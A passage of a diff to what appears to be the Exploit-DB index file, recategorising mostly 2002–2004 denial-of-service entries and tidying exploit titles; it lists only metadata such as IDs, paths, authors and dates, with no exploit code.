SQL Injection",2002-12-20,frog,php,webapps,0 22108,platforms/php/webapps/22108.txt,"SPGPartenaires 3.0.1 delete.php SQL Injection",2002-12-20,frog,php,webapps,0 22109,platforms/php/webapps/22109.txt,"W-Agora 4.1.6 EditForm.PHP Cross-Site Scripting Vulnerability",2002-12-22,xatr0z,php,webapps,0 -22110,platforms/php/webapps/22110.txt,"PHP-Nuke 6.0 Modules.PHP Denial of Service Vulnerability",2002-12-23,"Ing. Bernardo Lopez",php,webapps,0 +22110,platforms/php/dos/22110.txt,"PHP-Nuke 6.0 - Modules.PHP Denial of Service Vulnerability",2002-12-23,"Ing. Bernardo Lopez",php,dos,0 22111,platforms/cgi/webapps/22111.pl,"CHETCPASSWD 1.12 Shadow File Disclosure Vulnerability",2002-12-22,"Victor Pereira",cgi,webapps,0 22112,platforms/windows/remote/22112.txt,"PlatinumFTPServer 1.0.6 Information Disclosure Vulnerability",2002-12-30,"Dennis Rand",windows,remote,0 22113,platforms/windows/remote/22113.txt,"PlatinumFTPServer 1.0.6 - Arbitrary File Deletion Vulnerability",2002-12-30,"Dennis Rand",windows,remote,0 @@ -19743,7 +19743,7 @@ id,file,description,date,author,platform,type,port 22501,platforms/php/webapps/22501.txt,"Xonic.ru News 1.0 script.php Remote Command Execution Vulnerability",2003-03-31,"DWC Gr0up",php,webapps,0 22492,platforms/php/webapps/22492.txt,"EZ Publish 2.2.7/3.0 - Multiple Path Disclosure Vulnerabilities",2003-04-15,"gregory Le Bras",php,webapps,0 22493,platforms/hardware/webapps/22493.txt,"CheckPoint/Sofaware Firewall Multiple Vulnerabilities",2012-11-05,Procheckup,hardware,webapps,0 -22494,platforms/php/webapps/22494.txt,"OSCommerce 2.2 Product_Info.PHP Denial of Service Vulnerability",2003-04-15,"Lorenzo Hernandez Garcia-Hierro",php,webapps,0 +22494,platforms/php/dos/22494.txt,"OSCommerce 2.2 - Product_Info.PHP Denial of Service Vulnerability",2003-04-15,"Lorenzo Hernandez Garcia-Hierro",php,dos,0 22496,platforms/multiple/remote/22496.txt,"Python 2.2/2.3 Documentation Server Error Page Cross-Site Scripting Vulnerability",2003-04-15,euronymous,multiple,remote,0 22497,platforms/multiple/remote/22497.txt,"12Planet Chat Server 2.5 Error Message Installation Path Disclosure Vulnerability",2003-04-11,"Dennis Rand",multiple,remote,0 22498,platforms/php/webapps/22498.txt,"OSCommerce 2.2 - Authentication Bypass Vulnerability",2003-04-15,"Lorenzo Hernandez Garcia-Hierro",php,webapps,0 @@ -19752,7 +19752,7 @@ id,file,description,date,author,platform,type,port 22502,platforms/multiple/dos/22502.pl,"TW-WebServer 1.0 - Denial of Service Vulnerability (1)",2003-04-15,badpack3t,multiple,dos,0 22503,platforms/multiple/dos/22503.c,"TW-WebServer 1.0 - Denial of Service Vulnerability (2)",2003-04-16,"Shashank pandey",multiple,dos,0 22504,platforms/windows/remote/22504.txt,"Cerberus FTP Server 2.1 Information Disclosure Weakness",2003-04-16,"Ziv Kamir",windows,remote,0 -22505,platforms/multiple/remote/22505.txt,"Apache Mod_Access_Referer 1.0.2 NULL Pointer Dereference Denial of Service Vulnerability",2003-04-16,zillion,multiple,remote,0 +22505,platforms/multiple/dos/22505.txt,"Apache Mod_Access_Referer 1.0.2 - NULL Pointer Dereference Denial of Service Vulnerability",2003-04-16,zillion,multiple,dos,0 22506,platforms/windows/remote/22506.txt,"EZ Server 1.0 File Disclosure Vulnerability",2003-04-17,"gregory Le Bras",windows,remote,0 22507,platforms/asp/webapps/22507.txt,"Web Wiz Forum 6.34 Information Disclosure Vulnerability",2003-04-17,"Uziel aka nuJIurpuM",asp,webapps,0 22508,platforms/linux/dos/22508.sh,"Xinetd 2.1.x/2.3.x Rejected Connection Memory Leakage Denial of Service Vulnerability",2003-04-18,"Steve Grubb",linux,dos,0 @@ -19904,7 +19904,7 @@ id,file,description,date,author,platform,type,port 22657,platforms/multiple/remote/22657.rb,"Java Applet JAX-WS Remote Code Execution",2012-11-13,metasploit,multiple,remote,0 22658,platforms/linux/remote/22658.pl,"Batalla Naval 1.0 4 - Remote Buffer Overflow Vulnerability (1)",2003-05-26,wsxz,linux,remote,0 22659,platforms/linux/remote/22659.c,"Batalla Naval 1.0 4 - Remote Buffer Overflow Vulnerability (2)",2003-05-26,jsk,linux,remote,0 -22660,platforms/php/webapps/22660.txt,"PostNuke Phoenix 0.72x Rating System Denial of Service Vulnerability",2003-05-26,"Lorenzo Manuel Hernandez Garcia-Hierro",php,webapps,0 +22660,platforms/php/dos/22660.txt,"PostNuke Phoenix 0.72x - Rating System Denial of Service Vulnerability",2003-05-26,"Lorenzo Manuel Hernandez Garcia-Hierro",php,dos,0 22661,platforms/freebsd/local/22661.c,"Upclient 5.0 b7 Command Line Argument Buffer Overflow Vulnerability",2003-05-27,"Gino Thomas",freebsd,local,0 22662,platforms/multiple/remote/22662.txt,"iPlanet Messaging Server 5.0/5.1 HTML Attachment Cross-Site Scripting Vulnerability",2003-05-27,KernelPanikLabs,multiple,remote,0 22663,platforms/php/webapps/22663.txt,"Newsscript 1.0 Administrative Privilege Elevation Vulnerability",2003-05-27,"Peter Winter-Smith",php,webapps,0 @@ -19914,7 +19914,7 @@ id,file,description,date,author,platform,type,port 22667,platforms/windows/dos/22667.txt,"BaSoMail 1.24 POP3 Server Denial of Service Vulnerability",2003-05-28,"Ziv Kamir",windows,dos,0 22668,platforms/windows/dos/22668.txt,"BaSoMail 1.24 SMTP Server Command Buffer Overflow Vulnerability",2003-05-28,"Ziv Kamir",windows,dos,0 22669,platforms/cgi/webapps/22669.txt,"Bandmin 1.4 - Cross-Site Scripting Vulnerability",2003-05-28,"silent needel",cgi,webapps,0 -22670,platforms/windows/remote/22670.c,"Microsoft IIS 5 WebDAV PROPFIND and SEARCH Method Denial of Service Vulnerability",2003-05-28,Neo1,windows,remote,0 +22670,platforms/windows/remote/22670.c,"Microsoft IIS 5 WebDAV - PROPFIND and SEARCH Method Denial of Service Vulnerability",2003-05-28,Neo1,windows,remote,0 22671,platforms/php/webapps/22671.txt,"Webfroot Shoutbox 2.32 URI Parameter File Disclosure Vulnerability",2003-05-29,pokleyzz,php,webapps,0 22672,platforms/php/webapps/22672.txt,"Cafelog b2 0.6 - Remote File Include Vulnerability",2003-05-29,pokleyzz,php,webapps,0 22673,platforms/asp/webapps/22673.txt,"Philboard 1.14 philboard_admin.ASP Authentication Bypass Vulnerability",2003-05-29,aresu@bosen.net,asp,webapps,0 @@ -20456,7 +20456,7 @@ id,file,description,date,author,platform,type,port 23228,platforms/linux/local/23228.c,"SLocate 2.6 User-Supplied Database Heap Overflow Vulnerability",2003-10-06,"Patrik Hornik",linux,local,0 23229,platforms/windows/remote/23229.cpp,"Microsoft Windows XP/2000/2003 Message Queuing Service Heap Overflow Vulnerability",2003-10-07,DaveK,windows,remote,0 23230,platforms/multiple/remote/23230.txt,"Adobe SVG Viewer 3.0 postURL/getURL Restriction Bypass Vulnerability",2003-10-07,"GreyMagic Software",multiple,remote,0 -23231,platforms/multiple/remote/23231.txt,"Medieval Total War 1.0/1.1 nickname Denial of Service Vulnerability",2003-10-07,"Luigi Auriemma",multiple,remote,0 +23231,platforms/multiple/dos/23231.txt,"Medieval Total War 1.0/1.1 - nickname Denial of Service Vulnerability",2003-10-07,"Luigi Auriemma",multiple,dos,0 23232,platforms/php/webapps/23232.txt,"PayPal Store Front 3.0 - 'index.php' Remote File Include Vulnerability",2003-10-08,"Zone-h Security Team",php,webapps,0 23233,platforms/php/webapps/23233.txt,"GeekLog 1.3.x HTML Injection Vulnerabilities",2003-10-08,Jelmer,php,webapps,0 23234,platforms/windows/dos/23234.c,"Centrinity FirstClass 5.50/5.77/7.0/7.1 - HTTP Server Long Version Field Denial of Service Vulnerability",2003-10-08,I2S-LaB,windows,dos,0 @@ -20538,7 +20538,7 @@ id,file,description,date,author,platform,type,port 23308,platforms/linux/local/23308.c,"kpopup 0.9.x Privileged Command Execution Vulnerability",2003-10-28,b0f,linux,local,0 23309,platforms/multiple/remote/23309.txt,"Centrinity FirstClass 7.1 HTTP Server Directory Disclosure Vulnerability",2003-10-28,"Richard Maudsley",multiple,remote,0 23310,platforms/windows/dos/23310.pl,"TelCondex SimpleWebserver 2.12.30210 build 3285 HTTP Referer Remote Buffer Overflow Vulnerability",2003-10-29,"Oliver Karow",windows,dos,0 -23311,platforms/php/webapps/23311.txt,"E107 Chatbox.php Denial of Service Vulnerability",2003-10-29,Blademaster,php,webapps,0 +23311,platforms/php/dos/23311.txt,"E107 - Chatbox.php Denial of Service Vulnerability",2003-10-29,Blademaster,php,dos,0 23312,platforms/cgi/remote/23312.txt,"BEA Tuxedo 6/7/8 and WebLogic Enterprise 4/5 Input Validation Vulnerability",2003-10-30,"Corsaire Limited",cgi,remote,0 23315,platforms/jsp/webapps/23315.txt,"BEA WebLogic 6/7/8 InteractiveQuery.jsp Cross-Site Scripting Vulnerability",2003-10-31,"Corsaire Limited",jsp,webapps,0 23316,platforms/windows/remote/23316.txt,"Citrix Metaframe XP - Cross-Site Scripting Vulnerability",2003-10-31,"Andy Davis",windows,remote,0 @@ -20594,7 +20594,7 @@ id,file,description,date,author,platform,type,port 23364,platforms/linux/local/23364.sh,"WMAPM 3.1 Privilege Escalation Vulnerability",2003-11-08,"Knud Erik Hojgaard",linux,local,0 23365,platforms/windows/remote/23365.txt,"telcondex simplewebserver 2.13.31027 build 3289 - Directory Traversal Vulnerability",2003-11-10,nimber@designer.ru,windows,remote,0 23366,platforms/linux/remote/23366.c,"Epic 1.0.1/1.0.x CTCP Nickname Server Message Buffer Overrun Vulnerability",2003-11-10,Li0n7,linux,remote,0 -23367,platforms/cgi/webapps/23367.txt,"OnlineArts DailyDose 1.1 DoSe.pl Remote Command Execution Vulnerability",2003-11-10,Don_Huan,cgi,webapps,0 +23367,platforms/cgi/webapps/23367.txt,"OnlineArts DailyDose 1.1 - DoSe.pl Remote Command Execution Vulnerability",2003-11-10,Don_Huan,cgi,webapps,0 23368,platforms/linux/remote/23368.c,"Winace UnAce 2.2 Command Line Argument Buffer Overflow Vulnerability (1)",2003-11-10,demz,linux,remote,0 23369,platforms/linux/remote/23369.c,"Winace UnAce 2.2 Command Line Argument Buffer Overflow Vulnerability (2)",2003-11-10,Li0n7,linux,remote,0 23370,platforms/cgi/webapps/23370.txt,"ncube server manager 1.0 - Directory Traversal Vulnerability",2003-11-10,"Beck Mr.R",cgi,webapps,0 @@ -20676,7 +20676,7 @@ id,file,description,date,author,platform,type,port 23457,platforms/php/webapps/23457.txt,"BES-CMS 0.4/0.5 folder.php File Include Vulnerability",2003-12-20,frog,php,webapps,0 23458,platforms/php/webapps/23458.txt,"BES-CMS 0.4/0.5 hacking.php File Include Vulnerability",2003-12-20,frog,php,webapps,0 23459,platforms/php/webapps/23459.txt,"Xoops 2.0.5.1 - MyLinks Myheader.php Cross-Site Scripting Vulnerability",2003-12-21,"Chintan Trivedi",php,webapps,0 -23460,platforms/php/webapps/23460.pl,"ProjectForum 8.4.2.1 - Find Request Denial of Service Vulnerability",2003-12-22,"Peter Winter-Smith",php,webapps,0 +23460,platforms/php/dos/23460.pl,"ProjectForum 8.4.2.1 - Find Request Denial of Service Vulnerability",2003-12-22,"Peter Winter-Smith",php,dos,0 23461,platforms/windows/remote/23461.txt,"dcam webcam server personal Web server 8.2.5 - Directory Traversal Vulnerability",2003-12-22,"Luigi Auriemma",windows,remote,0 23462,platforms/php/webapps/23462.txt,"osCommerce 2.2 products_id URI Parameter SQL Injection Vulnerability",2003-12-22,JeiAr,php,webapps,0 23463,platforms/php/webapps/23463.txt,"osCommerce 2.2 manufacturers_id Parameter Cross-Site Scripting Vulnerability",2003-12-22,JeiAr,php,webapps,0 @@ -20956,7 +20956,7 @@ id,file,description,date,author,platform,type,port 23747,platforms/php/webapps/23747.txt,"XMB Forum 1.8 BBcode align Tag XSS",2004-02-23,"Janek Vind",php,webapps,0 23748,platforms/php/webapps/23748.txt,"XMB Forum 1.8 forumdisplay.php Multiple Parameter SQL Injection",2004-02-23,"Janek Vind",php,webapps,0 23749,platforms/php/webapps/23749.txt,"LiveJournal 1.1 CSS HTML Injection Vulnerability",2004-02-23,"Michael Scovetta",php,webapps,0 -23750,platforms/php/webapps/23750.txt,"RobotFTP Server 1.0/2.0 - Remote Pre-authenticated Command Denial of Service Vulnerability",2004-02-24,"Zone-h Security Team",php,webapps,0 +23750,platforms/php/dos/23750.txt,"RobotFTP Server 1.0/2.0 - Remote Pre-authenticated Command Denial of Service Vulnerability",2004-02-24,"Zone-h Security Team",php,dos,0 23751,platforms/windows/remote/23751.txt,"Apache Cygwin 1.3.x/2.0.x - Directory Traversal Vulnerability",2004-02-24,"Jeremy Bae",windows,remote,0 23752,platforms/windows/dos/23752.c,"Digital Reality Game Engine 1.0.x - Remote Denial of Service Vulnerability",2004-02-24,"Luigi Auriemma",windows,dos,0 23753,platforms/php/webapps/23753.txt,"Working Resources BadBlue Server 2.40 phptest.php Path Disclosure Vulnerability",2004-02-24,"Rafel Ivgi",php,webapps,0 @@ -21272,7 +21272,7 @@ id,file,description,date,author,platform,type,port 24075,platforms/php/webapps/24075.txt,"Coppermine Photo Gallery 1.x theme.php Multiple Parameter Remote File Inclusion",2004-04-30,"Janek Vind",php,webapps,0 24076,platforms/windows/remote/24076.txt,"Sambar 5.x Open Proxy and Authentication Bypass Vulnerability",2003-01-30,"David Endler",windows,remote,0 24077,platforms/windows/remote/24077.txt,"Business Objects Crystal Reports 9/10 Web Form Viewer Directory Traversal Vulnerability",2004-05-03,"Imperva Application Defense Center",windows,remote,0 -24078,platforms/linux/local/24078.c,"PaX 2.6 Kernel Patch - Denial of Service Vulnerability",2004-05-03,Shadowinteger,linux,local,0 +24078,platforms/linux/dos/24078.c,"PaX 2.6 Kernel Patch - Denial of Service Vulnerability",2004-05-03,Shadowinteger,linux,dos,0 24079,platforms/linux/remote/24079.c,"APSIS Pound 1.5 - Remote Format String Vulnerability",2004-05-03,"Nilanjan De",linux,remote,0 24080,platforms/windows/dos/24080.pl,"Titan FTP Server 3.0 LIST Denial of Service Vulnerability",2004-05-04,storm,windows,dos,0 24081,platforms/cfm/webapps/24081.txt,"E-Zone Media FuzeTalk 2.0 AddUser.CFM Administrator Command Execution Vulnerability",2004-05-05,"Stuart Jamieson",cfm,webapps,0 @@ -21374,7 +21374,7 @@ id,file,description,date,author,platform,type,port 24178,platforms/windows/dos/24178.txt,"ToCA Race Driver Multiple Remote Denial of Service Vulnerabilities",2004-06-08,"Luigi Auriemma",windows,dos,0 24179,platforms/linux/remote/24179.txt,"Roundup 0.5/0.6 - Remote File Disclosure Vulnerability",2004-06-08,"Vickenty Fesunov",linux,remote,0 24180,platforms/php/webapps/24180.txt,"Invision Gallery 2.0.5 - SQL Injection Vulnerability",2013-01-17,"Ashiyane Digital Security Team",php,webapps,0 -24181,platforms/openbsd/remote/24181.sh,"OpenBSD 3.x ISAKMPD Security Association Piggyback Delete Payload Denial of Service Vulnerability",2004-06-08,"Thomas Walpuski",openbsd,remote,0 +24181,platforms/openbsd/dos/24181.sh,"OpenBSD 3.x - ISAKMPD Security Association Piggyback Delete Payload Denial of Service Vulnerability",2004-06-08,"Thomas Walpuski",openbsd,dos,0 24182,platforms/linux/local/24182.c,"CVS 1.11.x - Multiple Vulnerabilities",2004-06-09,"Gyan Chawdhary",linux,local,0 24183,platforms/php/webapps/24183.txt,"cPanel 5-9 Passwd Remote SQL Injection Vulnerability",2004-06-09,verb0s@virtualnova.net,php,webapps,0 24184,platforms/asp/webapps/24184.txt,"AspDotNetStorefront 3.3 Access Validation Vulnerability",2004-06-09,"Thomas Ryan",asp,webapps,0 @@ -21382,7 +21382,7 @@ id,file,description,date,author,platform,type,port 24190,platforms/java/webapps/24190.txt,"PHP-Nuke 6.x/7.x FAQ Module categories Parameter XSS",2004-06-11,"Janek Vind",java,webapps,0 24191,platforms/php/webapps/24191.txt,"PHP-Nuke 6.x/7.x Encyclopedia Module Multiple Function XSS",2004-06-11,"Janek Vind",php,webapps,0 24192,platforms/php/webapps/24192.txt,"PHP-Nuke 6.x/7.x Reviews Module order Parameter SQL Injection",2004-06-11,"Janek Vind",php,webapps,0 -24193,platforms/php/webapps/24193.txt,"PHP-Nuke 6.x/7.x Score Subsystem score Variable DoS",2004-06-11,"Janek Vind",php,webapps,0 +24193,platforms/php/webapps/24193.txt,"PHP-Nuke 6.x/7.x - Multiple Input Validation Vulnerabilities",2004-06-11,"Janek Vind",php,webapps,0 24194,platforms/php/webapps/24194.txt,"PHP-Nuke 6.x/7.x Reviews Module Multiple Parameter XSS",2004-06-11,"Janek Vind",php,webapps,0 24195,platforms/windows/dos/24195.pl,"WinAgents TFTP Server 3.0 - Remote Buffer Overrun Vulnerability",2004-06-11,"Ziv Kamir",windows,dos,0 24196,platforms/windows/remote/24196.txt,"Mozilla Browser 1.6/1.7 URI Obfuscation Weakness",2004-06-14,http-equiv,windows,remote,0 @@ -21401,7 +21401,7 @@ id,file,description,date,author,platform,type,port 24208,platforms/windows/dos/24208.c,"FreeIPS 1.0 Protected Service Denial of Service Vulnerability",2004-06-14,shawnwebb@softhome.net,windows,dos,0 24209,platforms/windows/dos/24209.txt,"Sygate Personal Firewall Pro 5.5 - Local Denial of Service Vulnerability",2004-06-14,"Tan Chew Keong",windows,dos,0 24210,platforms/hp-ux/local/24210.pl,"HP-UX 7-11 - Local X Font Server Buffer Overflow Vulnerability",2003-03-10,watercloud,hp-ux,local,0 -24211,platforms/windows/remote/24211.txt,"Microsoft Internet Explorer 6.0 HREF Save As Denial of Service Vulnerability",2004-06-15,"Rafel Ivgi The-Insider",windows,remote,0 +24211,platforms/windows/dos/24211.txt,"Microsoft Internet Explorer 6.0 - HREF Save As Denial of Service Vulnerability",2004-06-15,"Rafel Ivgi The-Insider",windows,dos,0 24212,platforms/php/webapps/24212.txt,"Pivot 1.0 - Remote module_db.PHP File Include Vulnerability",2004-06-15,loofus,php,webapps,0 24213,platforms/windows/remote/24213.txt,"Microsoft Internet Explorer 5.0.1 Wildcard DNS Cross-Site Scripting Vulnerability",2004-06-15,"bitlance winter",windows,remote,0 24214,platforms/asp/webapps/24214.txt,"Web Wiz Forums 7.x Registration_Rules.ASP Cross-Site Scripting Vulnerability",2004-06-15,"Ferruh Mavituna",asp,webapps,0 @@ -21495,7 +21495,7 @@ id,file,description,date,author,platform,type,port 24302,platforms/asp/webapps/24302.pl,"Polar Helpdesk 3.0 Cookie Based Authentication System Bypass Vulnerability",2004-07-21,"Noam Rathaus",asp,webapps,0 24303,platforms/php/webapps/24303.txt,"Layton Technology HelpBox 3.0.1 - Multiple SQL Injection Vulnerabilities",2004-07-21,"Noam Rathaus",php,webapps,0 24304,platforms/windows/remote/24304.txt,"Imatix Xitami 2.5 Server Side Includes Cross-Site Scripting Vulnerability",2004-07-22,"Oliver Karow",windows,remote,0 -24305,platforms/multiple/webapps/24305.txt,"PSCS VPOP3 2.0 Email Server Remote Denial of Service Vulnerability",2004-07-22,dr_insane,multiple,webapps,0 +24305,platforms/multiple/dos/24305.txt,"PSCS VPOP3 2.0 - Email Server Remote Denial of Service Vulnerability",2004-07-22,dr_insane,multiple,dos,0 24306,platforms/php/webapps/24306.txt,"EasyWeb 1.0 FileManager Module Directory Traversal Vulnerability",2004-07-23,sullo@cirt.net,php,webapps,0 24307,platforms/php/webapps/24307.txt,"PostNuke 0.7x Install Script Administrator Password Disclosure Vulnerability",2004-07-24,hellsink,php,webapps,0 24308,platforms/multiple/remote/24308.rb,"Java Applet Method Handle Remote Code Execution",2013-01-24,metasploit,multiple,remote,0 @@ -21599,12 +21599,12 @@ id,file,description,date,author,platform,type,port 24408,platforms/cgi/webapps/24408.txt,"Web-APP.Org WebAPP 0.8/0.9.x - Directory Traversal Vulnerability",2004-08-24,"Jerome Athias",cgi,webapps,0 24409,platforms/windows/remote/24409.txt,"Working Resources BadBlue 1.7.x/2.x Unauthorized Proxy Relay Vulnerability",2002-12-11,Texonet,windows,remote,0 24410,platforms/php/webapps/24410.txt,"PHP Code Snippet Library 0.8 - Multiple Cross-Site Scripting Vulnerabilities",2004-08-24,"Nikyt0x Argentina",php,webapps,0 -24411,platforms/windows/local/24411.c,"Sysinternals Regmon 6.11 - Local Denial of Service Vulnerability",2004-08-25,"Next Generation Security",windows,local,0 +24411,platforms/windows/dos/24411.c,"Sysinternals Regmon 6.11 - Local Denial of Service Vulnerability",2004-08-25,"Next Generation Security",windows,dos,0 24412,platforms/windows/dos/24412.c,"RealVNC Server 4.0 - Remote Denial of Service Vulnerability",2004-08-25,Uz4yh4N,windows,dos,0 24413,platforms/windows/remote/24413.txt,"NullSoft Winamp 2-5 - (.wsz) Remote Code Execution Vulnerability",2004-07-26,anonymous,windows,remote,0 24414,platforms/multiple/remote/24414.txt,"keene digital media server 1.0.2 - Directory Traversal variant Vulnerability",2004-08-26,"GulfTech Security",multiple,remote,0 24415,platforms/php/webapps/24415.txt,"Nagl XOOPS Dictionary Module 1.0 - Multiple Cross-Site Vulnerabilities",2004-08-28,CyruxNET,php,webapps,0 -24416,platforms/windows/remote/24416.txt,"Ipswitch WS_FTP Server 5.0.x CD Command Malformed File Path Remote Denial of Service Vulnerability",2004-08-30,lion,windows,remote,0 +24416,platforms/windows/dos/24416.txt,"Ipswitch WS_FTP Server 5.0.x - CD Command Malformed File Path Remote Denial of Service Vulnerability",2004-08-30,lion,windows,dos,0 24417,platforms/windows/remote/24417.txt,"Xedus Web Server 1.0 test.x username Parameter XSS",2004-09-30,"James Bercegay",windows,remote,0 24418,platforms/windows/remote/24418.txt,"Xedus Web Server 1.0 testgetrequest.x username Parameter XSS",2004-09-30,"James Bercegay",windows,remote,0 24419,platforms/windows/remote/24419.txt,"Xedus Web Server 1.0 Traversal Arbitrary File Access",2004-09-30,"James Bercegay",windows,remote,0 @@ -21740,7 +21740,7 @@ id,file,description,date,author,platform,type,port 24631,platforms/asp/webapps/24631.txt,"PD9 Software MegaBBS 2.0/2.1 thread-post.asp Multiple Header CRLF Injection",2004-09-27,pigrelax,asp,webapps,0 24632,platforms/asp/webapps/24632.txt,"PD9 Software MegaBBS 2.0/2.1 ladder-log.asp Multiple Parameter SQL Injection",2004-09-27,pigrelax,asp,webapps,0 24633,platforms/asp/webapps/24633.txt,"PD9 Software MegaBBS 2.0/2.1 view-profile.asp Multiple Parameter SQL Injection",2004-09-27,pigrelax,asp,webapps,0 -24634,platforms/windows/remote/24634.c,"Windows XP TCP Packet Fragmentation Handling Denial of Service Vulnerability (1)",2004-09-27,Coolio,windows,remote,0 +24634,platforms/windows/dos/24634.c,"Microsoft Windows XP - TCP Packet Fragmentation Handling Denial of Service Vulnerability (1)",2004-09-27,Coolio,windows,dos,0 24578,platforms/osx/local/24578.rb,"Setuid Tunnelblick Privilege Escalation",2013-03-05,metasploit,osx,local,0 24579,platforms/osx/local/24579.rb,"Viscosity setuid-set ViscosityHelper Privilege Escalation",2013-03-05,metasploit,osx,local,0 24580,platforms/windows/dos/24580.txt,"Kaspersky Internet Security 2013 - Denial of Service Vulnerability",2013-03-05,"Marc Heuse",windows,dos,0 @@ -21773,7 +21773,7 @@ id,file,description,date,author,platform,type,port 24607,platforms/windows/remote/24607.txt,"Google Toolbar 1.1.x About.HTML HTML Injection Vulnerability",2004-09-17,ViperSV,windows,remote,0 24608,platforms/osx/local/24608.txt,"MacOSXLabs RsyncX 2.1 - Local Privilege Escalation Vulnerability",2004-09-17,"Matt Johnston",osx,local,0 24609,platforms/osx/local/24609.txt,"MacOSXLabs RsyncX 2.1 Insecure Temporary File Creation Vulnerability",2004-09-17,"Matt Johnston",osx,local,0 -24610,platforms/multiple/webapps/24610.txt,"DNS4Me 3.0 - Denial of Service And Cross-Site Scripting Vulnerabilities",2004-09-17,"James Bercegay",multiple,webapps,0 +24610,platforms/multiple/dos/24610.txt,"DNS4Me 3.0 - Denial of Service And Cross-Site Scripting Vulnerabilities",2004-09-17,"James Bercegay",multiple,dos,0 24611,platforms/cgi/webapps/24611.txt,"YaBB 1.x/9.1.2000 Administrator Command Execution Vulnerability",2004-09-17,"GulfTech Security",cgi,webapps,0 24612,platforms/cgi/webapps/24612.txt,"YaBB 1.x/9.1.2000 YaBB.pl IMSend Cross-Site Scripting Vulnerability",2004-09-17,"GulfTech Security",cgi,webapps,0 24613,platforms/php/webapps/24613.txt,"ReMOSitory SQL Injection Vulnerability",2004-09-18,khoaimi,php,webapps,0 @@ -21782,20 +21782,20 @@ id,file,description,date,author,platform,type,port 24616,platforms/php/webapps/24616.txt,"TUTOS file_overview.php link_id Parameter SQL Injection",2004-09-20,"Joxean Koret",php,webapps,0 24617,platforms/php/webapps/24617.txt,"TUTOS app_new.php t Parameter XSS",2004-09-20,"Joxean Koret",php,webapps,0 24618,platforms/windows/dos/24618.c,"Impressions Games Lords of the Realm III Nickname Remote Denial of Service Vulnerability",2004-09-20,"Luigi Auriemma",windows,dos,0 -24619,platforms/cgi/webapps/24619.txt,"EmuLive Server4 - Authentication Bypass And Denial of Service Vulnerabilities",2004-09-21,"James Bercegay",cgi,webapps,0 +24619,platforms/cgi/dos/24619.txt,"EmuLive Server4 - Authentication Bypass And Denial of Service Vulnerabilities",2004-09-21,"James Bercegay",cgi,dos,0 24620,platforms/windows/dos/24620.c,"LeadMind Pop Messenger 1.60 Illegal Character Remote Denial of Service Vulnerability",2004-09-21,"Luigi Auriemma",windows,dos,0 -24621,platforms/php/webapps/24621.txt,"Pinnacle ShowCenter 1.51 Web Interface Skin Denial of Service Vulnerability",2004-09-21,"Marc Ruef",php,webapps,0 +24621,platforms/php/dos/24621.txt,"Pinnacle ShowCenter 1.51 - Web Interface Skin Denial of Service Vulnerability",2004-09-21,"Marc Ruef",php,dos,0 24622,platforms/linux/remote/24622.c,"LaTeX2rtf 1.9.15 - Remote Buffer Overflow Vulnerability",2004-09-21,"D. J. Bernstein",linux,remote,0 -24623,platforms/windows/remote/24623.txt,"Sophos Anti-Virus 3.x Reserved MS-DOS Name Scan Evasion Vulnerability",2004-09-22,"Kurt Seifried",windows,remote,0 +24623,platforms/windows/remote/24623.txt,"Sophos Anti-Virus 3.x - Reserved MS-DOS Name Scan Evasion Vulnerability",2004-09-22,"Kurt Seifried",windows,remote,0 24624,platforms/windows/remote/24624.c,"Alt-N MDaemon 6.5.1 SMTP Server Multiple Command Remote Overflow",2004-09-16,D_BuG,windows,remote,0 24625,platforms/asp/webapps/24625.txt,"FreezingCold Broadboard search.asp SQL Injection",2004-09-27,pigrelax,asp,webapps,0 24626,platforms/asp/webapps/24626.txt,"FreezingCold Broadboard profile.asp SQL Injection",2004-09-27,pigrelax,asp,webapps,0 24627,platforms/php/webapps/24627.txt,"Qool CMS 2.0 RC2 - Multiple Vulnerabilities",2013-03-07,LiquidWorm,php,webapps,0 24629,platforms/php/webapps/24629.txt,"CosCMS 1.721 - OS Command Injection",2013-03-07,"High-Tech Bridge SA",php,webapps,0 24630,platforms/cgi/webapps/24630.txt,"mnoGoSearch 3.3.12 (search.cgi) - Arbitrary File Read",2013-03-07,"Sergey Bobrov",cgi,webapps,0 -24635,platforms/windows/remote/24635.c,"Windows XP TCP Packet Fragmentation Handling Denial of Service Vulnerability (2)",2004-09-27,Coolio,windows,remote,0 -24636,platforms/windows/remote/24636.c,"Windows XP TCP Packet Fragmentation Handling Denial of Service Vulnerability (3)",2004-09-27,"Ken Hollis",windows,remote,0 -24637,platforms/windows/remote/24637.c,"Windows XP TCP Packet Fragmentation Handling Denial of Service Vulnerability (4)",2004-09-27,"Ken Hollis",windows,remote,0 +24635,platforms/windows/dos/24635.c,"Microsoft Windows XP - TCP Packet Fragmentation Handling Denial of Service Vulnerability (2)",2004-09-27,Coolio,windows,dos,0 +24636,platforms/windows/dos/24636.c,"Microsoft Windows XP - TCP Packet Fragmentation Handling Denial of Service Vulnerability (3)",2004-09-27,"Ken Hollis",windows,dos,0 +24637,platforms/windows/dos/24637.c,"Microsoft Windows XP - TCP Packet Fragmentation Handling Denial of Service Vulnerability (4)",2004-09-27,"Ken Hollis",windows,dos,0 24638,platforms/php/webapps/24638.txt,"@lexPHPTeam @lex Guestbook 3.12 - Remote PHP File Include Vulnerability",2004-09-27,"Himeur Nourredine",php,webapps,0 24639,platforms/windows/dos/24639.c,"Microsoft SQL Server 7.0 - Remote Denial of Service Vulnerability (1)",2004-09-28,"securma massine",windows,dos,0 24640,platforms/windows/dos/24640.c,"Microsoft SQL Server 7.0 - Remote Denial of Service Vulnerability (2)",2004-09-28,"Sebastien Tricaud",windows,dos,0 @@ -21857,7 +21857,7 @@ id,file,description,date,author,platform,type,port 24978,platforms/linux/remote/24978.txt,"Xine-Lib 0.9/1 - Remote Client-Side Buffer Overflow Vulnerability",2004-12-16,"Ariel Berkman",linux,remote,0 24696,platforms/linux/remote/24696.c,"Linux Kernel 2.6.x - IPTables Logging Rules Integer Underflow Vulnerability",2004-11-21,"Richard Hart",linux,remote,0 24697,platforms/php/webapps/24697.txt,"Serendipity 0.x Exit.PHP HTTP Response Splitting Vulnerability",2004-10-21,ChaoticEvil,php,webapps,0 -24698,platforms/php/webapps/24698.txt,"UBBCentral UBB.threads 3.4/3.5 DoSearch.PHP SQL Injection Vulnerability",2004-10-21,"Florian Rock",php,webapps,0 +24698,platforms/php/webapps/24698.txt,"UBBCentral UBB.threads 3.4/3.5 - DoSearch.PHP SQL Injection Vulnerability",2004-10-21,"Florian Rock",php,webapps,0 24699,platforms/windows/dos/24699.txt,"Microsoft Windows XP WAV File Handler Denial of Service Vulnerability",2004-10-22,HexView,windows,dos,0 24700,platforms/cgi/webapps/24700.txt,"Netbilling NBMEMBER Script Information Disclosure 